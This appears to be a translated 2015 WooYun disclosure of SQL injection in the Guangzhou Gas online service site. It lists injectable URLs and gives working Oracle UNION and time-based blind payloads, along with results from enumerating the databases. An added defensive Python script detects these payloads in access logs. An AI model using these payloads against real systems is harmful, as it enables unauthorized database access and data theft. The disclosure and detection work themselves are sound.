Vulnerability summary

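Bug ID: wooyun-2015-0123028

Title: SQL injection vulnerability in the Guangzhou Gas online service hall

Vendor: National Internet Emergency Center (CNCERT/CC)

Author: 路人甲

Submitted: 2015-06-27 00:19

Fixed: 2015-08-15 14:14

Publicly disclosed: 2015-08-15 14:14

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 15

Status: Handed over to a third-party partner organization (Guangdong Information Security Evaluation Center) for handling

Source: http://www.wooyun.org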


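Vulnerability details

Disclosure status:

2015-06-27: Details reported to the vendor; awaiting vendor handling
2015-07-01: Vendor confirmed; details disclosed to the vendor only
2015-07-11: Details disclosed to core white hats and experts in the relevant field
2015-07-21: Details disclosed to regular white hats
2015-07-31: Details disclosed to trainee white hats
2015-08-15: Details disclosed to the public

Brief description:

SQL injection vulnerability in the Guangzhou Gas online service hall

Detailed description:

Multiple injection points, for example:
http://www.gz96833.com/comqnaList.action?dictid=1&flag=1
http://www.gz96833.com/useGasTypeList.action?dictid=1&flag=1
http://www.gz96833.com/useGasTypeListView.action?fid=326&typeid=2&detailid=
Taking the first as an example: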

Place: GET
Parameter: dictid
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: dictid=1' UNION ALL SELECT NULL,CHR(58)||CHR(106)||CHR(120)||CHR(101)||CHR(58)||CHR(101)||CHR(66)||CHR(117)||CHR(68)||CHR(80)||CHR(66)||CHR(122)||CHR(88)||CHR(108)||CHR(101)||CHR(58)||CHR(115)||CHR(108)||CHR(122)||CHR(58),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- &flag=1
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: dictid=1' AND 9087=DBMS_PIPE.RECEIVE_MESSAGE(CHR(87)||CHR(72)||CHR(72)||CHR(76),5) AND 'iPLE'='iPLE&flag=1
---
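
A detection sketch added here, not part of the original report or of the site's code: it scans web access-log lines for the two payload shapes in the sqlmap output above (the UNION probe built from CHR() concatenation and the DBMS_PIPE.RECEIVE_MESSAGE delay) in the query parameters the report names. The log format, the sample lines and the rule that these parameters are plain integers are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Query parameters that appear in the URLs listed in the report.
WATCHED_PARAMS = {"dictid", "flag", "fid", "typeid", "detailid"}

# Patterns modelled on the two payload shapes in the sqlmap output (Oracle).
SIGNATURES = {
    "union-select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "chr-concat": re.compile(r"chr\(\d+\)\s*\|\|\s*chr\(\d+\)", re.I),
    "time-delay": re.compile(r"dbms_pipe\s*\.\s*receive_message", re.I),
}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def scan_line(line):
    """Return sorted (parameter, finding) pairs for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    hits = set()
    # parse_qsl percent-decodes values, so URL-encoded payloads still match.
    query = urlsplit(m.group(1)).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.lower() not in WATCHED_PARAMS:
            continue
        # Assumption: these parameters only ever carry plain integers.
        if value and not re.fullmatch(r"[0-9]+", value):
            hits.add((name, "non-numeric"))
        for label, pattern in SIGNATURES.items():
            if pattern.search(value):
                hits.add((name, label))
    return sorted(hits)

def scan(lines):
    """Map 1-based line number to findings, skipping clean lines."""
    return {n: h for n, line in enumerate(lines, 1) if (h := scan_line(line))}

# Constructed sample lines (combined log format, documentation IP ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Jun/2015:00:01:02 +0800] "GET /comqnaList.action?dictid=1&flag=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [27/Jun/2015:00:01:05 +0800] "GET /comqnaList.action?dictid=1%27%20UNION%20ALL%20SELECT%20NULL%2CCHR%2858%29%7C%7CCHR%28106%29%20FROM%20DUAL--%20&flag=1 HTTP/1.1" 200 5300',
    '198.51.100.7 - - [27/Jun/2015:00:01:09 +0800] "GET /comqnaList.action?dictid=1%27%20AND%209087%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2887%29%2C5%29%20AND%20%27x%27%3D%27x&flag=1 HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG).items():
        print(n, hits)
```

The "non-numeric" finding is the broadest signal and is also the shape of the server-side fix: reject any value that is not an integer before it reaches the query, and pass it as a bind variable.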



25 databases:

available databases [25]:


It is, after all, a provincial-level online service hall.
Table information for one arbitrarily chosen database:

Database: WT
[137 tables]


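There is a great deal of data, so I will not enumerate further!

Proof of vulnerability:

As described above!

Fix:

Copyright notice: when reposting, please credit the source 路人甲@乌云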


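Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 10

Confirmed: 2015-07-01 14:12

Vendor reply:

Thank you very much for your report.
The issue in the report has been confirmed and reproduced.
Data affected: High
Attack cost: Low
Impact: High
Overall rating: High, rank: 10
We are contacting the organization that manages the website to have it handled.

Latest status:

None yet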

